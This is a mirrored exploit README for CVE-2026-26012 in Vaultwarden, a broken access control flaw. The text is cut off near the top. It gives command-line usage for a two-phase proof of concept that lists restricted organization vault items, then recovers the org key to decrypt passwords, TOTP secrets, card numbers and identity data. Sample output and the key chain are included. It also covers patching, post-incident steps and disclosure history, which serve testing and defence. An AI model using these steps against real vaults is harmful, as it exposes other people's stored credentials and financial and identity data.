Share
## https://sploitus.com/exploit?id=8A492721-9798-5D38-A7FC-AE9C45493009
# CVE-2026-26012 โ€” Vaultwarden Cipher Enumeration PoC

> **Full Cipher Enumeration Ignoring Organization Collection Permissions**

A proof-of-concept exploit for [CVE-2026-26012](https://nvd.nist.gov/vuln/detail/CVE-2026-26012), a broken access control vulnerability in [Vaultwarden](https://github.com/dani-garcia/vaultwarden) (
All authentication options

```bash
# Bearer token (recommended โ€” works with SSO + 2FA)
--token "eyJhbGciOi..."

# Session cookie
--cookie "VAULTWARDEN_SESSION=abc123..."

# Raw Cookie header (multiple cookies)
--cookie-header "session=abc; token=xyz"

# Direct password login (NO SSO, NO 2FA only)
--email user@example.com --password "MasterPassword"
```

**How to extract your Bearer token:**

1. Log into the Vaultwarden web vault (complete SSO + 2FA as usual)
2. Open browser DevTools (**F12**) โ†’ **Network** tab
3. Click any item in the vault to trigger an API call
4. Find a request to `/api/...` and copy the **Authorization** header value




Additional options

```bash
--no-verify-ssl     # Skip SSL verification (self-signed certs)
--show-all          # Also display legitimately accessible ciphers
--max-display 50    # Max number of leaked ciphers to show (default: 20)
--output results.json  # Export full results to JSON
```



### Phase 2 โ€” Decrypt leaked ciphers

Recovers the organization encryption key and decrypts all leaked ciphers from Phase 1.

```bash
python3 poc_decrypt.py \
    --url https://vaultwarden.example.com \
    --token "eyJhbGciOi..." \
    --email user@example.com \
    --master-password "YourMasterPassword" \
    --org-id "ORG-UUID" \
    --leaked-json results.json \
    --output decrypted.json
```

> **Note:** `--master-password` is your Vaultwarden master password, used **locally** to derive the decryption key chain. It is never sent over the network. The `--token` handles API authentication.

> **Troubleshooting:** If key decryption fails, add `--debug` to see intermediate values at each step. The script automatically tries 5 strategies (HKDF modern, HMAC legacy, raw key, and HMAC-skip variants) to handle different account ages and configurations.


Alternative: provide the org key directly

If you already have the 64-byte organization key (128 hex characters):

```bash
python3 poc_decrypt.py \
    --org-key-hex "aabbccdd...128_hex_chars..." \
    --leaked-json results.json \
    --output decrypted.json
```



### Example Output

```
[*] === Key Recovery Chain ===

[1/6] Fetching KDF parameters...
       KDF: PBKDF2-SHA256, iterations: 600000
[2/6] Deriving master key...
[3/6] Stretching master key (HKDF-Expand)...
[4/6] Fetching encrypted keys from /api/sync...
       Organization: ACME Corp
[5/6] Decrypting user symmetric key...
[6/6] Decrypting RSA private key โ†’ Organization key...

[+] Organization key recovered successfully!

[*] Decrypting 42 cipher(s)...

============================================================
  DECRYPTION RESULTS
============================================================
  Total:     42
  Decrypted: 42
  Errors:    0

  IMPACT SUMMARY
  Passwords recovered:     35
  TOTP secrets recovered:  12
  Card numbers recovered:  3
============================================================
```

## How It Works

### Key Derivation Chain

Every organization member already possesses the organization's symmetric key, encrypted with their RSA public key. The decryption chain is:

```
Master Password + Email
    โ”‚  PBKDF2-SHA256 or Argon2id
    โ–ผ
Master Key (32 bytes)
    โ”‚  HKDF-Expand-SHA256
    โ–ผ
Stretched Key: encKey (32B) โ•‘ macKey (32B)
    โ”‚  AES-256-CBC (decrypts profile.key)
    โ–ผ
User Symmetric Key: encKey (32B) โ•‘ macKey (32B)
    โ”‚  AES-256-CBC (decrypts profile.privateKey)
    โ–ผ
RSA Private Key (2048-bit PKCS#8 DER)
    โ”‚  RSA-OAEP-SHA1 (decrypts profile.organizations[].key)
    โ–ผ
Organization Key: encKey (32B) โ•‘ macKey (32B)
    โ”‚  AES-256-CBC + HMAC-SHA256
    โ–ผ
Decrypted cipher data
```

### Why Collection ACL Doesn't Protect the Data

In the Bitwarden/Vaultwarden model, **all ciphers in an organization share the same encryption key**. Collection-based access control is enforced **server-side only** โ€” the cryptographic model does not enforce collection boundaries. Any member who has the org key can decrypt any cipher in the organization. This CVE bypasses the server-side filter, exposing all ciphers to any member.

### What Gets Decrypted

| Cipher Type | Decrypted Fields |
|-------------|-----------------|
| **Login** | username, password, TOTP secret, URIs |
| **Card** | cardholder, number, CVV, expiration |
| **Identity** | name, SSN, passport, address, phone, email |
| **Secure Note** | full note content |
| **All types** | custom fields, attachment metadata |

## Remediation

**Update Vaultwarden to 1.35.3 or later immediately.**

```bash
docker pull vaultwarden/server:1.35.3
```

After patching, run Phase 1 again to confirm the fix โ€” the tool should report `NOT VULNERABLE`.

### Post-Incident Actions

If you were running a vulnerable version in a multi-user organization:

1. **Rotate all credentials** stored in collections that were restricted from some members
2. **Revoke and regenerate TOTP secrets** for any accounts with TOTP stored in the vault
3. **Review organization membership** and remove unnecessary members
4. **Audit access logs** for unusual API calls to `/api/ciphers/organization-details`

## Responsible Disclosure

This PoC is published **after** the vulnerability was publicly disclosed and patched:

- **2026-02-10** โ€” Vaultwarden 1.35.3 released with the fix
- **2026-02-11** โ€” CVE-2026-26012 assigned and advisory published
- **2026-02-11** โ€” [GHSA-h265-g7rm-h337](https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-h265-g7rm-h337) published

## Acknowledgments

This PoC would not exist without the work of the original security researchers and maintainers:

| Role | Who | Contribution |
|------|-----|-------------|
| **Vulnerability Reporter** | [@odgrso](https://github.com/odgrso) | Discovered and responsibly disclosed CVE-2026-26012 |
| **Remediation Developer** | [@BlackDex](https://github.com/BlackDex) | Developed and shipped the fix in Vaultwarden 1.35.3 |
| **Project Maintainer** | [@dani-garcia](https://github.com/dani-garcia) | Vaultwarden creator, coordinated the advisory and release |

Thank you for keeping the open-source ecosystem safer.

## Legal Disclaimer

This proof of concept is provided **strictly for authorized security testing and educational purposes**. You must have **explicit written authorization** before testing any system you do not own. Unauthorized access to computer systems is illegal under the CFAA (US), Computer Misuse Act (UK), and equivalent laws worldwide. The authors assume no liability for misuse.

## References

- [GHSA-h265-g7rm-h337](https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-h265-g7rm-h337) โ€” GitHub Security Advisory
- [CVE-2026-26012](https://nvd.nist.gov/vuln/detail/CVE-2026-26012) โ€” NVD Entry
- [Vaultwarden 1.35.3](https://github.com/dani-garcia/vaultwarden/releases/tag/1.35.3) โ€” Patched Release
- [Bitwarden Security Whitepaper](https://bitwarden.com/help/bitwarden-security-white-paper/) โ€” Encryption Model Reference

## License

MIT โ€” See [LICENSE](LICENSE).